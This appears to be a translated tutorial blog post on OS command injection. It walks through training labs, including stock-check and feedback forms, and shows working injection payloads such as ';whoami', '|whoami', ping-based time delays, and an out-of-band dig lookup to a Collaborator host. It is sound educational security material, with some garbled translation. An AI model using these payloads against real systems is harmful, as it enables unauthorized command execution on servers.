OS command injection vulnerabilities (Part 2)

Tram Ho

II. Analysis and exploitation of OS command injection vulnerabilities (continued)

3. Common OS command injection vulnerabilities

Consider a shopping website that includes a function to check the amount of products left in stock with the following URL:

https://insecure-website.com/stockStatus?productID=381&storeID=29

In it, the website uses the productID and storeID passed in the shell statement as follows:

stockreport.pl 381 29

The command will return the result in the user interface. Note that here, the two parameters productID and storeID can be changed by the user, so we can take advantage of this mechanism to create a Command injection attack. An attacker can pass the productID parameter the value & echo aiwefwlguh & . Then the shell statement becomes:

stockreport.pl & echo aiwefwlguh & 29

As we discussed about the & character above, the above command is actually three commands that execute simultaneously: stockreport.pl , echo aiwefwlguh and 29 . Then in the interface returns the following results:

In the first line, the stockreport.pl command failed due to missing parameters, the second command executed successfully, the third 29 was not found, resulting in an error . We only need to care about the result of the second command, the string aiwefwlguh returned means that the echo command executed successfully. We confirm here that it is possible to exploit the Command injection vulnerability.

Analyze lab OS command injection, simple case

image.png

Description: The website contains a Command injection vulnerability in the function to check the remaining quantity of products. Knowing that the system uses the productId and storeId parameters, the user request returns the result after executing the shell command at the server. To solve the lab, we need to execute the whoami command which returns the current user in the server.

In the product detail view, the Check stock function allows users to check the number of orders left in stock.

image.png

Observe the request in Burp Suite:

image.png

We see that the request uses the POST method passing to the system two parameters productId and storeId . These two values ​​can be changed arbitrarily by the user.

Because the system directly passes these parameter values ​​to the shell command, we can change the value to execute arbitrary shell commands, for example: Execute command id see user ID (uid), group ID groups (gid) and the groups to which they are members.

Now, after executing the shell command to get the results of the remaining products, the system simultaneously executes the id command and returns the result uid=12001(peter-CUXeyH) gid=12001(peter) groups=12001(peter) :

image.png

Some payloads we can use:

  • Payload 1: Use ; interrupt, then execute whoami : productId=1&storeId=1;whoami

image.png

  • Payload 2: Stop the order with | : productId=1&storeId=1|whoami

image.png

  • Payload 3: Interrupt command with %0d :

image.png

There are many other payloads for you to learn!

4. Blind OS command injection vulnerability

In the process of learning how to operate functions that can lead to OS command injection vulnerabilities above, we see that there are some functions that will return results at the browser interface, and some functions only execute the command. but does not return results, but displays results indirectly through other data logging commands. In fact, OS Command injection vulnerability is the same, not always the website will return the shell command we inject as clearly as in the above case. However, it cannot be denied that there is no OS Command injection vulnerability. This type of vulnerability is called Blind OS command injection vulnerabilities .

Consider a website that contains a function that allows users to fill in personal information when placing an order, in which the user enters an email address and a successful order notification will be replied to their email. To do this, the website executes a mailing program that takes as input an email from the user as follows:

mail -s "Content of Email" -aFrom:peter@normal-user.net notification@vulnerable-website.com

Of course in this case will not respond to the results of shell commands injected by the user. So the question is, how to check, or are there any signs to help us identify this type of “blind” vulnerability?

5. Check for Blind OS command injection vulnerabilities with time delays

We can test this vulnerability by using a command after inject that will cause the system response to contain a time delay. Thereby by observing allows us to confirm that the command was executed based on the application delay and response time. The ping command is definitely a good choice in this case:

& ping -c 10 127.0.0.1 &

The above command line example will cause the application to ping to localhost in

ten ten seconds.

Lab analysis Blind OS command injection with time delays

image.png

Description: The website contains a blind Command injection vulnerability in the user feedback function, but the output is not displayed. Know that the system executes shell commands at the server with user input parameters. To solve the lab, we need to exploit a vulnerability that causes the system to be delayed in

ten ten seconds.

The Submit feedback function allows users to enter name , email , subject , message messsage . These values ​​are passed to the system via the POST method:

image.png

image.png

To check if the system has a Command injection vulnerability, we can use the dig command to perform a DNS lookup to check the response from the server. Multiple domains can be used for free. Here I use Burp Collaborator, with domain name: 8s1uu77drmsnrws11qcmew82nttrhg.burpcollaborator.net , add ;dig+8s1uu77drmsnrws11qcmew82nttrhg.burpcollaborator.net after each parameter to check:

image.png

The email parameter returns a successful DNS lookup. Thus the email value is used in the shell command at the server. Can use the ping command to cause deley

ten ten seconds system:

Payload: email=hacker%40gmail.com||ping+-c+10+127.0.0.1||

References

Share the news now

Source : Viblo